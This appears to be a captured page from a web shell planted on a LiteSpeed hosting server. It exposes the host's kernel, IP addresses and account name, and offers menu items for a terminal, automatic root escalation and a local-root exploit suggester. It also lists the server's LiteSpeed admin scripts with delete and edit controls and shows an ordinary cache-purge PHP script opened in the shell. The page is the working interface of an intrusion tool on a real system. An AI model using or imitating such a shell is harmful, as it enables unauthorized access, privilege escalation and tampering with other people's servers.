Linux sea-business-23.hostwindsdns.com 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
LiteSpeed
Server IP : 104.168.155.189 & Your IP : 216.73.217.84
Domains :
Cant Read [ /etc/named.conf ]
User : zvmcccat
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
admin /
misc /
Delete
Unzip
Name
Size
Permission
Date
Action
admpass.sh
1.17
KB
-r-xr-xr-x
2026-08-15 11:10
ap_lsws.sh
1.82
KB
-rwxr-xr-x
2026-08-16 11:14
ap_lsws.sh.in
1.82
KB
-r-xr-xr-x
2026-08-15 11:10
awstats_install.sh
2.06
KB
-r-xr-xr-x
2026-08-15 11:10
build_ap_wrapper.sh
624
B
-r-xr-xr-x
2026-08-15 11:10
chroot.sh
7.31
KB
-r-xr-xr-x
2026-08-15 11:10
cleancache.sh
1.46
KB
-r-xr-xr-x
2026-08-15 11:10
cleanlitemage.sh
2.4
KB
-r-xr-xr-x
2026-08-15 11:10
cp_switch_ws.sh
22.96
KB
-r-xr-xr-x
2026-08-15 11:10
cpanel_restart_httpd.in
732
B
-r-xr-xr-x
2026-08-15 11:10
create_admin_keypair.sh
336
B
-r-xr-xr-x
2026-08-15 11:10
enable_ruby_python_selector.sh
2.8
KB
-r-xr-xr-x
2026-08-15 11:10
fix_cagefs.sh
766
B
-r-xr-xr-x
2026-08-15 11:10
fp_install.sh
1.65
KB
-r-xr-xr-x
2026-08-15 11:10
gdb-bt
25
B
-rw-r--r--
2026-08-15 11:10
genjCryptionKeyPair.php
6.43
KB
-rw-r--r--
2026-08-15 11:10
gzipStatic.sh
272
B
-r-xr-xr-x
2026-08-15 11:10
htpasswd.php
103
B
-rw-r--r--
2026-08-15 11:10
lscmctl
16.05
KB
-rwxrwxr-x
2026-06-19 06:27
lshttpd.service
675
B
-r-xr-xr-x
2026-08-15 11:10
lsup.sh
5.65
KB
-r-xr-xr-x
2026-08-15 11:10
lsup5.sh
4.17
KB
-r-xr-xr-x
2019-03-27 12:08
lsup5v2.sh
4.04
KB
-r-xr-xr-x
2019-01-31 13:08
lsup5v3.sh
5.63
KB
-r-xr-xr-x
2023-01-14 11:50
lsup6.sh
5.65
KB
-r-xr-xr-x
2026-08-15 11:10
lsws.rc
1.78
KB
-r-xr-xr-x
2026-08-15 11:10
lsws.rc.gentoo
441
B
-r-xr-xr-x
2026-08-15 11:10
mgr_ver.sh
1.93
KB
-r-xr-xr-x
2026-08-15 11:10
php.ini
37.11
KB
-rw-r--r--
2026-08-15 11:10
purge_cache_by_url
3.23
KB
-r-xr-xr-x
2026-08-15 11:10
purge_cache_byurl.php
1.21
KB
-rw-r--r--
2018-11-27 13:08
rc-inst.sh
6.24
KB
-r-xr-xr-x
2026-08-15 11:10
rc-uninst.sh
4.61
KB
-r-xr-xr-x
2026-08-15 11:10
uninstall.sh
2.9
KB
-r-xr-xr-x
2026-08-15 11:10
update.sh
1.85
KB
-r-xr-xr-x
2026-08-15 11:10
Save
Rename
<?php /**** * purge_cache_byurl * * Example: /usr/local/lsws/admin/fcgi-bin/admin_php5 /usr/local/lsws/admin/misc/purge_cache_byurl.php -r mywebsite.com /index.php */ if ($argc < 4 || $argc > 6) { echo "Invalid arguments!\n"; echo "Usage: php $argv[0] -(r|p) domain url [server_ip] [port] -r method option: Refresh cache (use stale cache while updating cache) -p method option: Purge cache (delete cache entry) domain: required parameter for domain name url: required parameter for url server_ip: optional parameter, default is 127.0.0.1 server_port: optional parameter, default is 80 "; exit; } if ( $argv[1] == '-p' ) $method = "PURGE"; else if ($argv[1] == '-r' ) $method = "REFRESH"; else { echo "ERROR: unknown or missing method option"; exit; } $domain = $argv[2]; $url = $argv[3]; $server_ip = ($argc >= 5) ? $argv[4] : '127.0.0.1'; $port = ($argc == 6) ? $argv[5] : 80; $fp = fsockopen($server_ip, $port, $errno, $errstr, 2); if (!$fp) { echo "$errstr ($errno)\n"; } else { $out = "$method $url HTTP/1.0\r\n" . "Host: $domain\r\n" . "Connection: Close\r\n\r\n"; fwrite($fp, $out); while (!feof($fp)) { echo fgets($fp, 128); } fclose($fp); } ?>